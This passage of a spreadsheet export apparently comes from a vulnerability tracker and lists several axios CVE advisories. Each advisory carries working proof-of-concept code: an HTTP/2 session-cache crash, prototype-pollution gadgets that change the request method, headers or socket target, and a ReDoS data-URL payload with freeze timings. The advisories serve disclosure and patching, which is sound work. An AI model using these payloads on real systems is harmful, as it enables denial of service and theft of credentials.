    // Adding a short timeout to prevent attacker from waiting too long if target is slow
    timeout: 5000 
  });
  try {
    const response = await axiosInstance.get('/');
    res.writeHead(200, { 'Content-Type': 'text/plain' });
    res.end(`Internal HTTP/2 request successful for ID: ${http2optionId}\nStatus: ${response.status}`);
  } catch (error) {
    // Check for the specific error indicating session limit reached
    if (error.isAxiosError &amp;&amp; error.code === axios.AxiosError.ERR_BAD_OPTION_VALUE) {
      console.error(`[SERVER] Internal HTTP/2 request failed for ID: ${http2optionId}: ${error.message}`);
      res.writeHead(500, { 'Content-Type': 'text/plain' });
      res.end(`Internal HTTP/2 request failed for ID: ${http2optionId}: ${error.message}`);
    } else {
      console.error(`[SERVER] Internal HTTP/2 request failed for ID: ${http2optionId}:`, error.message);
      res.writeHead(500, { 'Content-Type': 'text/plain' });
      res.end(`Internal HTTP/2 request failed for ID: ${http2optionId}: Generic error - ${error.message}`);
    }
  }
});
server.listen(PORT, () =&gt; {
  console.log(`PoC Server listening on http://localhost:${PORT}`);
  console.log(`Targeting internal HTTP/2 requests to: ${TARGET_URL}`);
  console.log(`Send requests to http://localhost:${PORT}?http2optionId=...`);
  console.log(`Expected behavior with current patch: After ~100 unique http2optionIds, subsequent requests will receive ERR_BAD_OPTION_VALUE.`);
});
```
i tested all that in latest git version, after starting the server.cjs, to trigger that you just need do
```rust
relunsec@relunsec:~/software/axios-1/poc/poc$ curl http://127.0.0.1:3000/?http2optionId=hi
curl: (52) Empty reply from server
```
that is extremly simple to trigger
it confirms a DoS in the HTTP/2 session cache, that needs be patched, the impact is will lead the server crashes and shutdown by an attacker, the server is written properly and no flaws in it and try catch blocks and errors handled however because that is an axios internal error will crash
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T598" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101901</t>
        </is>
      </c>
    </row>
    <row r="599">
      <c r="A599" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B599" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C599" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101902</t>
        </is>
      </c>
      <c r="D599" s="5" t="inlineStr"/>
      <c r="E599" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F599" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G599" s="5" t="inlineStr"/>
      <c r="H599" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I599" s="5" t="inlineStr"/>
      <c r="J599" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K599" s="5" t="inlineStr"/>
      <c r="L599" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M599" s="5" t="inlineStr">
        <is>
          <t>0.34.0, 1.20.0</t>
        </is>
      </c>
      <c r="N599" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O599" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P599" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q599" s="5" t="inlineStr"/>
      <c r="R599" s="5" t="inlineStr"/>
      <c r="S599" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios default-instance requests that omit an explicit method can read an inherited `method` value from `Object.prototype`. If another vulnerability in the same process pollutes `Object.prototype.method`, calls such as `axios.request({ url })` and `axios({ url })` can send a state-changing HTTP method instead of the expected default `GET`.
Axios does not create the prototype pollution source. This is a read-side gadget in axios request dispatch.
## Impact
In an affected application with a separate prototype-pollution primitive, an attacker can change axios default-instance requests that omit `method` from `GET` to methods such as `DELETE`, `POST`, `PUT`, or `PATCH`. The practical impact depends on the target endpoint and can include unintended writes, deletion, or other state changes.
Method aliases such as `axios.get(url)` and requests with an explicit own `method` are not affected by the confirmed method path.
## Affected Functionality
Affected:
- Default axios instance calls: `axios.request({ url })`.
- Callable shorthand: `axios({ url })`.
- Requests where no own `config.method` is provided.
Not affected in the confirmed method PoC:
- `axios.get(url)` and other method aliases.
- `axios.request({ url, method: 'GET' })`.
- `axios.create().request({ url })` when the created instance defaults are produced by current `mergeConfig()` and do not inherit from `Object.prototype`.
## Technical Details
`lib/core/Axios.js` sets the request method with:
```js
config.method = (config.method || this.defaults.method || 'get').toLowerCase();
```
`mergeConfig()` now returns a null-prototype request config, so `config.method` is safe from `Object.prototype`. However, the default axios instance stores the module defaults object as `this.defaults`, and that defaults object is a normal object. If `Object.prototype.method` exists, `this.defaults.method` resolves to the polluted inherited value.
Local verification on axios `1.18.1` showed a default-instance `axios.request({ url })` request reaching a loopback server as `DELETE` after `Object.prototype.method = 'DELETE'`.
## Proof of Concept of Attack
Constrained local demonstration:
```js
Object.prototype.method = 'DELETE';
try {
  await axios.request({ url: 'http://127.0.0.1:&lt;port&gt;/resource' });
} finally {
  delete Object.prototype.method;
}
```
Expected safe behavior is a `GET` request. Current affected behavior sends `DELETE` on the default instance when no method is provided.
## Workarounds
Use explicit method aliases such as `axios.get()` or set an own `method` on request configs. Avoid default-instance shorthand for requests in processes where prototype pollution is suspected or possible.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
### Summary
Axios `1.17.0` contains a read-side prototype-pollution gadget in the default Axios instance. If another vulnerability in the same Node.js process pollutes `Object.prototype.method`, default-instance calls such as `axios.request({ url })` and `axios({ url })` can be forced to use an attacker-controlled HTTP method, such as `DELETE`, instead of the expected default `GET`.
Axios does not create the prototype pollution by itself. The issue is that Axios reads fallback values from `this.defaults` without an own-property guard, allowing inherited values from `Object.prototype` to influence request behavior.
This should be treated as a prototype-pollution gadget, not as a standalone prototype-pollution source. In other words, Axios is not the component that lets the attacker write to `Object.prototype`; Axios is the component that becomes dangerous after `Object.prototype` has already been polluted by another bug in the same process.
### Details
The vulnerable fallback read is in `lib/core/Axios.js`:
```js
// Set config.allowAbsoluteUrls
if (config.allowAbsoluteUrls !== undefined) {
  // do nothing
} else if (this.defaults.allowAbsoluteUrls !== undefined) {
  config.allowAbsoluteUrls = this.defaults.allowAbsoluteUrls;
} else {
  config.allowAbsoluteUrls = true;
}
// Set config.method
config.method = (config.method || this.defaults.method || 'get').toLowerCase();
```
The merged request `config` is created as a null-prototype object in `lib/core/mergeConfig.js`:
```js
const config = Object.create(null);
```
Therefore, when the caller does not provide `config.method`, the fallback becomes:
```js
this.defaults.method
```
The default Axios instance uses the module defaults object. In the tested version, that defaults object is affected by inherited properties from `Object.prototype`. If `Object.prototype.method` is polluted, `this.defaults.method` resolves to that inherited value and Axios uses it as the request method.
The same unsafe inherited-property pattern also affects `this.defaults.allowAbsoluteUrls`, which can change how absolute URLs are combined with `baseURL`.
### Proof of Concept
#### Access and Attack Conditions
No admin access is required for Axios itself. This is a library-level gadget.
The attacker must have an existing way to pollute `Object.prototype` in the same Node.js process, for example through a separate prototype-pollution vulnerability in another dependency or application input path. Axios is the gadget that turns that pollution into dangerous HTTP request behavior.
Required condition:
```text
Some other bug or unsafe merge path in the application must allow Object.prototype pollution.
```
What Axios contributes:
```text
Axios reads inherited Object.prototype.method through this.defaults.method and uses it as the HTTP method fallback.
```
What Axios does not do:
```text
Axios does not create Object.prototype pollution by itself.
```
Affected usage:
```js
axios.request({ url });
axios({ url });
```
Not affected in the confirmed PoC:
```js
axios.get(url);
axios.request({ url, method: "GET" });
axios.create().request({ url });
```
#### Reproduction Steps
1. Create a clean test directory and install Axios `1.17.0`:
```powershell
mkdir axios-validation
cd axios-validation
npm init -y
npm install axios@1.17.0 --no-audit --no-fund
```
2. Save the method override PoC below as:
```text
validate-prototype-method-gadget.mjs
```
3. Run the PoC:
```powershell
node validate-prototype-method-gadget.mjs
```
4. Confirm that the output shows:
```text
defaultRequestMethod=DELETE
defaultShorthandMethod=DELETE
getAliasMethod=GET
explicitGetMethod=GET
createdInstanceMethod=GET
RESULT: CONFIRMED
```
5. This proves that after `Object.prototype.method = "DELETE"`, default-instance calls that omit an explicit method are sent as `DELETE`.
#### What the Method PoC Script Does
The PoC starts a temporary local HTTP server for each Axios call and records the HTTP method received by that server. It then simulates an already-existing prototype-pollution condition by setting:
```js
Object.prototype.method = "DELETE";
```
While that pollution is active, the script sends five Axios requests:
```js
axios.request({ url });                 // expected vulnerable path
axios({ url });                         // expected vulnerable shorthand path
axios.get(url);                         // expected safe alias path
axios.request({ url, method: "GET" });  // expected safe explicit-method path
axios.create().request({ url });        // expected safe isolated-instance path
```
The script then deletes the polluted property:
```js
delete Object.prototype.method;
```
Finally, it prints the method observed by the local server for each request. The vulnerable behavior is confirmed when the default Axios instance sends `DELETE` for `axios.request({ url })` and `axios({ url })`, while the safe comparison paths still send `GET`.
#### Method Override PoC
Create `validate-prototype-method-gadget.mjs`:
```js
import http from "node:http";
import axios from "axios";
async function listen(server) {
  await new Promise((resolve) =&gt; server.listen(0, "127.0.0.1", resolve));
  return server.address().port;
}
async function runRequest(label, requestFn) {
  const hits = [];
  const server = http.createServer((req, res) =&gt; {
    hits.push({
      method: req.method,
      url: req.url,
    });
    res.writeHead(200, { "content-type": "application/json" });
    res.end(JSON.stringify({ ok: true }));
  });
  const port = await listen(server);
  const url = `http://127.0.0.1:${port}/${label}`;
  let status = "completed";
  let error = "";
  try {
    await requestFn(url);
  } catch (err) {
    status = "error";
    error = err?.message || String(err);
  }
  server.close();
  return { label, status, error, hits };
}
const results = [];
Object.prototype.method = "DELETE";
try {
  results.push(await runRequest("default-request-no-method", (url) =&gt; axios.request({ url })));
  results.push(await runRequest("default-shorthand-no-method", (url) =&gt; axios({ url })));
  results.push(await runRequest("default-get-alias", (url) =&gt; axios.get(url)));
  results.push(await runRequest("default-request-explicit-get", (url) =&gt; axios.request({ url, method: "GET" })));
  const instance = axios.create();
  results.push(await runRequest("created-instance-request-no-method", (url) =&gt; instance.request({ url })));
} finally {
  delete Object.prototype.method;
}
const defaultRequestMethod = results.find((r) =&gt; r.label === "default-request-no-method")?.hits[0]?.method || "";
const defaultShorthandMethod = results.find((r) =&gt; r.label === "default-shorthand-no-method")?.hits[0]?.method || "";
const getAliasMethod = results.find((r) =&gt; r.label === "default-get-alias")?.hits[0]?.method || "";
const explicitGetMethod = results.find((r) =&gt; r.label === "default-request-explicit-get")?.hits[0]?.method || "";
const createdInstanceMethod = results.find((r) =&gt; r.label === "created-instance-request-no-method")?.hits[0]?.method || "";
console.log(`axiosVersion=${axios.VERSION}`);
console.log(`results=${JSON.stringify(results)}`);
console.log(`defaultRequestMethod=${defaultRequestMethod}`);
console.log(`defaultShorthandMethod=${defaultShorthandMethod}`);
console.log(`getAliasMethod=${getAliasMethod}`);
console.log(`explicitGetMethod=${explicitGetMethod}`);
console.log(`createdInstanceMethod=${createdInstanceMethod}`);
const confirmed =
  defaultRequestMethod === "DELETE" &amp;&amp;
  defaultShorthandMethod === "DELETE" &amp;&amp;
  getAliasMethod === "GET" &amp;&amp;
  explicitGetMethod === "GET" &amp;&amp;
  createdInstanceMethod === "GET";
console.log(confirmed ? "RESULT: CONFIRMED" : "RESULT: NOT CONFIRMED");
process.exitCode = confirmed ? 0 : 1;
```
Run:
```powershell
node validate-prototype-method-gadget.mjs
```
Observed result:
```text
axiosVersion=1.17.0
defaultRequestMethod=DELETE
defaultShorthandMethod=DELETE
getAliasMethod=GET
explicitGetMethod=GET
createdInstanceMethod=GET
RESULT: CONFIRMED
```
The local server received:
```text
axios.request({ url })              -&gt; DELETE
axios({ url })                      -&gt; DELETE
axios.get(url)                      -&gt; GET
axios.request({ url, method:"GET" }) -&gt; GET
axios.create().request({ url })     -&gt; GET
```
This confirms that inherited `Object.prototype.method` controls the default method for vulnerable default-instance request paths.
#### Supporting `allowAbsoluteUrls` Gadget Evidence
The same inherited-property issue affects `allowAbsoluteUrls`.
Create `validate-prototype-allowabsoluteurls-gadget.mjs`:
```js
import http from "node:http";
import axios from "axios";
async function listen(server) {
  await new Promise((resolve) =&gt; server.listen(0, "127.0.0.1", resolve));
  return server.address().port;
}
async function runCase(label, requestFn) {
  const baseHits = [];
  const absoluteHits = [];
  const baseServer = http.createServer((req, res) =&gt; {
    baseHits.push({ method: req.method, url: req.url, host: req.headers.host || "" });
    res.end("base");
  });
  const absoluteServer = http.createServer((req, res) =&gt; {
    absoluteHits.push({ method: req.method, url: req.url, host: req.headers.host || "" });
    res.end("absolute");
  });
  const basePort = await listen(baseServer);
  const absolutePort = await listen(absoluteServer);
  try {
    await requestFn({
      baseURL: `http://127.0.0.1:${basePort}/api`,
      url: `http://127.0.0.1:${absolutePort}/absolute-path`,
    });
  } catch {}
  baseServer.close();
  absoluteServer.close();
  return { label, baseHits, absoluteHits };
}
const results = [];
results.push(await runCase("baseline-no-pollution", (config) =&gt; axios.request(config)));
Object.prototype.allowAbsoluteUrls = false;
try {
  results.push(await runCase("polluted-default-request", (config) =&gt; axios.request(config)));
  const instance = axios.create();
  results.push(await runCase("polluted-created-instance", (config) =&gt; instance.request(config)));
} finally {
  delete Object.prototype.allowAbsoluteUrls;
}
console.log(`axiosVersion=${axios.VERSION}`);
console.log(`results=${JSON.stringify(results)}`);
```
Observed result:
```text
axiosVersion=1.17.0
baselineUsedAbsolute=true
pollutedDefaultUsedBase=true
pollutedInstanceUsedAbsolute=true
RESULT: CONFIRMED
```
Without pollution, Axios sends the request to the absolute URL. After `Object.prototype.allowAbsoluteUrls = false`, the default Axios instance combines the absolute URL with `baseURL` and sends the request to the base server instead. An instance created with `axios.create()` remains unaffected.
### Impact
This is a prototype-pollution gadget. It becomes exploitable when an application has any separate prototype-pollution primitive that allows an attacker to set properties on `Object.prototype` in the same Node.js process.
If such pollution is possible, an attacker can influence Axios default-instance requests that omit an explicit method:
- `axios.request({ url })`
- `axios({ url })`
This can turn an expected safe default `GET` request into a state-changing method such as:
- `DELETE`
- `POST`
- `PUT`
- `PATCH`
Potential impact includes unauthorized state-changing requests, deletion of resources, unintended writes, data corruption, or denial of service when the target endpoint treats the HTTP method as security-relevant.
The issue does not require admin access to Axios itself, but it does require an existing prototype-pollution path in the application. Applications that always use explicit methods, method aliases such as `axios.get()`, or isolated instances created through `axios.create()` are not affected by the confirmed method-override path.
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T599" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101902</t>
        </is>
      </c>
    </row>
    <row r="600">
      <c r="A600" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B600" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C600" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101903</t>
        </is>
      </c>
      <c r="D600" s="5" t="inlineStr"/>
      <c r="E600" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F600" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G600" s="5" t="inlineStr"/>
      <c r="H600" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I600" s="5" t="inlineStr"/>
      <c r="J600" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K600" s="5" t="inlineStr"/>
      <c r="L600" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M600" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N600" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O600" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P600" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q600" s="5" t="inlineStr"/>
      <c r="R600" s="5" t="inlineStr"/>
      <c r="S600" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios for Node.js parses `data:` URLs in `lib/helpers/fromDataURI.js`. The current RFC-2397 parser uses a regular expression whose media type groups allow `/` inside both sides of the `type/subtype` match. A malformed `data:` URL containing many slashes and no comma forces the JavaScript regex engine to try many possible placements for the separator before failing.
Applications are affected when they pass untrusted URL strings to axios and do not reject or constrain `data:` URLs before axios parses them.
## Impact
An attacker can make the Node.js event loop spend significant synchronous CPU time parsing a single malformed URL. In a server that accepts a URL from an HTTP request and calls `axios.get(url)`, this can block unrelated requests and health checks until parsing completes.
The issue is availability-only. It does not disclose data or modify requests.
## Affected Functionality
Affected:
- Node.js HTTP adapter data URL handling.
- `axios.get()` or equivalent calls where `config.url` has the `data:` protocol.
Not affected:
- Browser fetch/XHR URL handling.
- Node requests where the application rejects `data:` URLs before calling axios.
- Older checked `0.x` data URL parser shape unless separately proven vulnerable.
## Technical Details
`lib/helpers/fromDataURI.js` contains:
```js
const DATA_URL_PATTERN = /^([^,;]+\/[^,;]+)?((?:;[^,;=]+=[^,;]+)*)(;base64)?,([\s\S]*)$/;
```
The `[^,;]+` groups include `/`, so a long string of slashes without a comma can be partitioned around the required `\/` in many ways before the match fails. The match runs before axios can apply request timeout behavior, so `timeout` does not mitigate the parsing pause.
Local timing on axios `1.18.1` with small payloads showed about 2.4 ms at 1000 slashes, 16.6 ms at 3000 slashes, and 71.5 ms at 6000 slashes, consistent with the submitted quadratic scaling while avoiding long-running payloads.
## Proof of Concept of Attack
Constrained helper-level demonstration:
```js
import axios from 'axios';
await axios.get('data:' + '/'.repeat(6000));
```
The request fails after parsing, but the failure is delayed by synchronous regex work. Larger payloads increase the pause substantially.
## Workarounds
Reject `data:` URLs before passing untrusted input to axios, or enforce a strict maximum URL length for URL-fetching endpoints. Applications that do not need `data:` URL support should deny that protocol explicitly.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
# ReDoS in `fromDataURI` data: URL parser freezes the event loop (DoS)
## Affected
- Package: `axios` (Node.js http adapter)
- Versions: 1.x (regex present on `v1.x`, current release line)
- File: `lib/helpers/fromDataURI.js`
- CWE-1333 (Inefficient Regular Expression Complexity)
## Issue
`fromDataURI` parses `data:` URLs with this regex:
```js
// lib/helpers/fromDataURI.js:9
const DATA_URL_PATTERN = /^([^,;]+\/[^,;]+)?((?:;[^,;=]+=[^,;]+)*)(;base64)?,([\s\S]*)$/;
```
The mediatype tokens `[^,;]+` include `/`, so they can span multiple slashes ambiguously. A `data:` URL made of many slashes with no comma forces the engine to try every way to place the single `\/` divider before failing — quadratic O(n²) backtracking. It runs synchronously on the main thread, so the whole Node event loop is frozen for the entire parse. Reachable through the public API on the Node http adapter (`axios.get(url)`); the browser fetch/xhr adapters are not affected because they do not call `fromDataURI`.
A configured `timeout` does not help: the freeze happens during parsing, before any network timer can fire.
## PoC (minimal)
```js
import axios from 'axios';
// ~256 KB data: URL of pure slashes, no comma
await axios.get('data:' + '/'.repeat(262139)); // blocks the event loop ~6 min, then throws
```
## Lab results
Single-threaded "fetch a user-supplied URL" service (link-preview style) calling `axios.get` on a JSON body `{ "url": "..." }`, with `timeout: 1000` set.
Scaling is clean O(n²) (constant k ≈ 5.6e-6 ms/byte², stable across sizes):
| data: URL size | Event-loop freeze (one request) |
| --- | --- |
| 32 KB | 6.3 s (measured end-to-end; server logged `event loop BLOCKED for 6.30s`) |
| 64 KB | ~24 s |
| 128 KB | ~96 s |
| 256 KB | ~385 s (~6.4 min) |
| 1 MB | ~100 min |
During the freeze the server answers nothing: a `/healthz` liveness probe times out for the whole window, and the server's own event-loop monitor cannot even log until the parse finishes. In a run through an intercepting proxy, the proxy hit its 120 s upstream timeout and gave up, while the origin stayed pegged at 100% CPU on one core past that — client/proxy timeouts do not mitigate it.
The attacker controls only the URL string and needs no auth. ~256 KB every ~6 min (≈ 0.7 bytes/sec) keeps a server permanently unavailable.
## Impact
Unauthenticated remote denial of service. One small request takes a Node service fully offline for minutes; a trickle keeps it down indefinitely.
CVSS 3.1: 7.5 (High) — `AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`.
## Fix
RFC 2045 type/subtype tokens never contain `/`. Excluding `/` from those two character classes removes the ambiguity and the backtracking:
```js
const DATA_URL_PATTERN = /^([^,;/]+\/[^,;/]+)?((?:;[^,;=]+=[^,;]+)*)(;base64)?,([\s\S]*)$/;
```
Worst-case parse drops from ~2600 ms to ~0.002 ms. All valid `data:` URLs, including slashes in the body, parse identically.
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T600" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101903</t>
        </is>
      </c>
    </row>
    <row r="601">
      <c r="A601" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B601" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C601" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101904</t>
        </is>
      </c>
      <c r="D601" s="5" t="inlineStr"/>
      <c r="E601" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F601" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G601" s="5" t="inlineStr"/>
      <c r="H601" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I601" s="5" t="inlineStr"/>
      <c r="J601" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K601" s="5" t="inlineStr"/>
      <c r="L601" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M601" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N601" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O601" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P601" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q601" s="5" t="inlineStr"/>
      <c r="R601" s="5" t="inlineStr"/>
      <c r="S601" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios request interceptors may return a replacement config object. If an interceptor returns a plain object without an own `headers` property, `dispatchRequest()` later evaluates `config.headers` and can resolve an inherited `Object.prototype.headers` value. In a process where another vulnerability has polluted `Object.prototype.headers`, axios can send attacker-controlled headers.
Axios does not create the prototype pollution source, and the interceptor itself is trusted caller code. The vulnerable behavior is the post-interceptor axios config read that reopens a prototype-pollution gadget after earlier null-prototype config hardening.
## Impact
An attacker with a prior same-process prototype-pollution primitive can inject headers into affected axios requests when the application uses an interceptor that rebuilds config and omits headers. Depending on the target service, injected headers can affect cache behavior, conditional requests, metadata services, or application-specific authorization and routing logic.
The issue is conditional and should not be described as affecting every interceptor or every request.
## Affected Functionality
Affected:
- Request interceptor chains where an interceptor returns a new ordinary object.
- Replacement config objects that omit an own `headers` property.
- `dispatchRequest()` header normalization through `AxiosHeaders.from(config.headers)`.
Not affected:
- Requests whose interceptor preserves an own `headers` property.
- Interceptors that mutate and return the existing null-prototype config.
- Processes without prototype pollution.
## Technical Details
`lib/core/dispatchRequest.js` contains:
```js
config.headers = AxiosHeaders.from(config.headers);
```
The initial merged config is null-prototype, but an interceptor can replace it with a normal object. If that object has no own `headers`, the read can resolve `Object.prototype.headers`.
Local verification on axios `1.18.1` polluted `Object.prototype.headers = { 'X-Poisoned': 'yes' }`, installed an interceptor that returned `{ url, method, timeout, proxy: false }`, and sent a request. The loopback server received `X-Poisoned: yes`.
## Proof of Concept of Attack
Constrained local demonstration:
```js
Object.prototype.headers = { 'X-Poisoned': 'yes' };
const client = axios.create();
client.interceptors.request.use((config) =&gt; ({
  url: config.url,
  method: config.method,
  timeout: config.timeout
}));
await client.get(url);
```
Expected safe behavior is that missing headers normalize to an empty header set. Current affected behavior reads inherited `Object.prototype.headers`.
## Workarounds
Interceptors that rebuild config should always set an own `headers` property, for example by preserving `config.headers` or setting `headers: {}`. Mutating and returning the existing merged config also avoids replacing the null-prototype object.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
## Summary
Axios 1.17.0 blocks the old `Object.prototype.common` header bucket gadget. However, if a request interceptor rebuilds a minimal config object and omits `headers`, `dispatchRequest()` reads inherited `Object.prototype.headers`.
This allows attacker-controlled headers to be placed on the wire.
## Affected Version
Validated on:
- axios: `1.17.0`
- commit: `4306df2`
- runtime: Node.js `v24.15.0`
## Preconditions
- A separate prototype-pollution primitive can write an object to `Object.prototype.headers`.
- A request interceptor rebuilds config and omits own `headers`.
## Root Cause
`dispatchRequest()` uses:
```js
config.headers = AxiosHeaders.from(config.headers);
```
If `config` is a normal object returned by an interceptor and lacks own `headers`, this reads `Object.prototype.headers`.
## Impact
An attacker can inject request headers. Depending on the target service, this can cause cache manipulation, conditional-response suppression, request smuggling preconditions, metadata-service header injection, or application-specific authorization bypass.
## Proof of Concept
```js
import axios from './index.js';
import http from 'http';
const start = (handler) =&gt; new Promise((resolve) =&gt; {
  const server = http.createServer(handler);
  server.listen(0, '127.0.0.1', () =&gt; resolve(server));
});
const stop = (server) =&gt; new Promise((resolve) =&gt; server.close(resolve));
const hits = [];
const server = await start((req, res) =&gt; {
  hits.push(req.headers);
  res.setHeader('Content-Type', 'application/json');
  res.end('{"ok":true}');
});
try {
  Object.prototype.headers = {
    'X-Poisoned': 'yes',
    'If-None-Match': '*'
  };
  const client = axios.create();
  client.interceptors.request.use((config) =&gt; ({
    url: config.url,
    method: config.method,
    timeout: config.timeout
  }));
  await client.get(`http://127.0.0.1:${server.address().port}/headers`, {
    timeout: 3000
  });
  console.log(hits[0]);
} finally {
  delete Object.prototype.headers;
  await stop(server);
}
```
Observed wire headers:
```json
{
  "x-poisoned": "yes",
  "if-none-match": "*",
  "user-agent": "axios/1.17.0"
}
```
## References
- https://github.com/axios/axios/security/advisories/GHSA-898c-q2cr-xwhg
- https://osv.dev/vulnerability/GHSA-898c-q2cr-xwhg
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T601" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101904</t>
        </is>
      </c>
    </row>
    <row r="602">
      <c r="A602" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B602" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C602" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101905</t>
        </is>
      </c>
      <c r="D602" s="5" t="inlineStr"/>
      <c r="E602" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F602" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G602" s="5" t="inlineStr"/>
      <c r="H602" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I602" s="5" t="inlineStr"/>
      <c r="J602" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K602" s="5" t="inlineStr"/>
      <c r="L602" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M602" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N602" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O602" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P602" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q602" s="5" t="inlineStr"/>
      <c r="R602" s="5" t="inlineStr"/>
      <c r="S602" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios' Node HTTP adapter can act as a read-side prototype-pollution gadget for Node's sensitive `createConnection` request option. The adapter creates a null-prototype options object, but Node's HTTP client can copy or normalize request options into ordinary objects before connection creation. If `Object.prototype.createConnection` has been polluted elsewhere in the same process, Node can call the inherited function and create a socket to an attacker-controlled endpoint.
Axios does not create the prototype pollution source. The vulnerability is that axios does not set an own safe value for a sensitive transport option before handing options to Node.
## Impact
Given a prior same-process prototype-pollution primitive, an attacker can redirect later axios Node HTTP requests at the socket layer while the request URL and axios config still appear to target the legitimate origin. The attacker-controlled endpoint can receive request headers and bodies, including Authorization headers, cookies, API keys, and service credentials, and can return attacker-controlled responses to the application.
This can bypass application destination validation that checks the URL before calling axios, because the URL remains legitimate while the underlying socket goes elsewhere.
## Affected Functionality
Affected:
- Node.js HTTP adapter.
- HTTP and HTTPS request paths that rely on Node/follow-redirects option processing and do not set an own safe `createConnection`.
- Processes where `Object.prototype.createConnection` is polluted.
Not affected:
- Browser adapters.
- Processes without prototype pollution.
- Requests using a custom trusted transport that ignores inherited `createConnection` and sanitizes options internally.
## Technical Details
`lib/adapters/http.js` creates:
```js
const options = Object.assign(Object.create(null), {
  path,
  method,
  headers,
  agents: { http: httpAgent, https: httpsAgent },
  auth,
  protocol,
  family,
  beforeRedirect: dispatchBeforeRedirect,
  beforeRedirects: Object.create(null),
  http2Options,
});
```
The object does not include an own `createConnection` property. Local verification on axios `1.18.1` polluted `Object.prototype.createConnection` to connect to an attacker loopback server. A request to a legitimate loopback server with an Authorization header returned the attacker's response; the legitimate server received no request and the attacker server received `Bearer SECRET`.
## Proof of Concept of Attack
Constrained local demonstration:
```js
Object.prototype.createConnection = function (_options, cb) {
  const socket = net.createConnection({ host: '127.0.0.1', port: attackerPort }, () =&gt; {
    if (typeof cb === 'function') cb(null, socket);
  });
  return socket;
};
